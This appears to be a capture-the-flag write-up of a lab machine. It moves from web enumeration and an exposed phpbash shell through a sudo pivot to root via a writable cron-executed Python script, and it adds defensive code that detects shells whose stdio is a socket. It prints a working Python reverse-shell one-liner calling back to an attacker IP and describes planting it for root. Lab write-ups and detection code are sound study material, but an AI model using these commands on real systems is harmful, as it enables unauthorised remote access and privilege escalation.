The nmap scan found a single open port, port 80.
Since it was an HTTP server, I navigated to the web page at the target IP address.
I didn't find much of interest on the web page itself, so I enumerated further with gobuster using the following command:
gobuster dir -u http://10.10.10.68 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,js,py,html,db,xml,sh,txt
gobuster found several interesting directories, but /dev caught my eye because it contained phpbash.php, a web shell that let me run bash commands from the browser.
Obtaining the user flag wasn't hard once I had found phpbash; I just had to navigate to the right user's home directory.
The problem was gaining root access. You guessed it: time for privilege escalation.
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.51",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
phpbash was useful but very limited, so I popped a reverse shell with the Python one-liner above, which connects back to my machine (10.10.14.51) on port 1234. The reverse shell connected successfully.
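A defender-side check for the artefact this technique leaves behind, added here as an example that is not part of the original writeup: a shell or interpreter whose standard input, output and error all point at a socket. With the python/pty.spawn one-liner above it is the python process whose fds 0-2 are the socket (the /bin/sh it spawns sits on a pty), while a plain bash reverse shell shows the pattern on bash itself. The /proc snapshot is passed in as data so the constructed sample runs offline; read_live_procs() gathers the same shape from a real Linux host (root is needed to read other users' fd links). The function names, the interpreter list and the sample PIDs are my own choices.

```python
"""Find shells/interpreters whose stdin, stdout and stderr are all a socket.

Added example (not from the original writeup). The dup2() calls in the
reverse-shell one-liner leave fds 0, 1 and 2 of the interpreter pointing at
the network socket, which is what /proc/<pid>/fd shows.
"""
import os
from typing import Dict, List, TypedDict


class Proc(TypedDict):
    comm: str            # process name as in /proc/<pid>/comm
    fds: Dict[int, str]  # fd number -> readlink target, e.g. "socket:[31337]"


# Assumed list of binaries worth flagging; extend for your environment.
INTERPRETERS = {"sh", "bash", "dash", "zsh", "python", "python2", "python3", "perl", "php"}


def stdio_on_socket(fds: Dict[int, str]) -> bool:
    """True when fds 0, 1 and 2 all resolve to a socket."""
    return all(fds.get(n, "").startswith("socket:[") for n in (0, 1, 2))


def find_socket_shells(procs: Dict[int, Proc]) -> List[int]:
    """PIDs of shells/interpreters whose standard streams are a socket."""
    return sorted(pid for pid, p in procs.items()
                  if p["comm"] in INTERPRETERS and stdio_on_socket(p["fds"]))


def read_live_procs() -> Dict[int, Proc]:
    """Collect comm and fd targets from /proc on a Linux host (best effort)."""
    procs: Dict[int, Proc] = {}
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        pid = int(entry)
        try:
            with open(f"/proc/{pid}/comm") as fh:
                comm = fh.read().strip()
            fds = {int(fd): os.readlink(f"/proc/{pid}/fd/{fd}")
                   for fd in os.listdir(f"/proc/{pid}/fd")}
        except OSError:
            continue  # process exited, or fd links not readable without root
        procs[pid] = {"comm": comm, "fds": fds}
    return procs


# Constructed snapshot modelled on the python/pty.spawn reverse shell above.
SAMPLE_PROCS: Dict[int, Proc] = {
    4242: {"comm": "python",  # the interpreter: socket on fds 0-2, pty master on 3
           "fds": {0: "socket:[31337]", 1: "socket:[31337]", 2: "socket:[31337]", 3: "/dev/ptmx"}},
    4243: {"comm": "sh",      # child spawned by pty.spawn: sits on the pty, not the socket
           "fds": {0: "/dev/pts/2", 1: "/dev/pts/2", 2: "/dev/pts/2"}},
    1200: {"comm": "bash",    # an ordinary login shell
           "fds": {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}},
    900:  {"comm": "sshd",    # a daemon with a socket, but not on its stdio
           "fds": {0: "/dev/null", 1: "/dev/null", 2: "/dev/null", 3: "socket:[555]"}},
}


if __name__ == "__main__":
    for pid in find_socket_shells(SAMPLE_PROCS):
        print(f"pid {pid} ({SAMPLE_PROCS[pid]['comm']}): stdio is a socket")
```

Run it on a live host by passing read_live_procs() instead of SAMPLE_PROCS; note that the shell child (pid 4243 in the sample) is deliberately not flagged, because its streams are the pty, so a rule that only looks at /bin/sh would miss this variant.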
The sudo -l command lists the commands the current user is allowed to run with sudo.
The entry (scriptmanager : scriptmanager) ALL means the user can run ALL commands as the user scriptmanager (the parenthesised pair is the run-as user and run-as group).
After getting a shell as scriptmanager by running sudo -u scriptmanager /bin/bash, I explored the file system and found a suspicious directory, /scripts, containing two files: test.py and test.txt. As you can see from the screenshot above, the former is owned by scriptmanager and the latter by root.
test.py is a Python program that writes into test.txt. Also, as the screenshot above shows, the timestamp displayed for test.txt is in a different format from test.py's, which suggests it is being written to regularly.
Running ls -la again confirmed my suspicion: a cron job is scheduled to execute test.py, which writes to test.txt.
A cron job is a task scheduled in Unix-like operating systems to run automatically at specified intervals. It is widely used to automate repetitive work such as system maintenance, backups, updates, or running scripts. When such a job runs as root but executes a file that a lower-privileged user can modify, that user can get arbitrary code run as root.
Since I knew a cron job executes test.py, I could replace the file with a Python reverse shell of the same name. The screenshot above shows the code: the same one-liner I used earlier, except with the port changed to 2222, because port 1234 was already in use by the first reverse shell.
Don't forget to make the file executable.
The command shown starts a simple HTTP server in the directory it is run from, so any files in that directory become accessible over HTTP.
Back in the scriptmanager shell, I removed the original test.py so I could replace it with my file containing the reverse shell code.
I transferred the file over using wget.
Within a minute (the cron job runs every minute), the root shell connected back and I captured the root flag.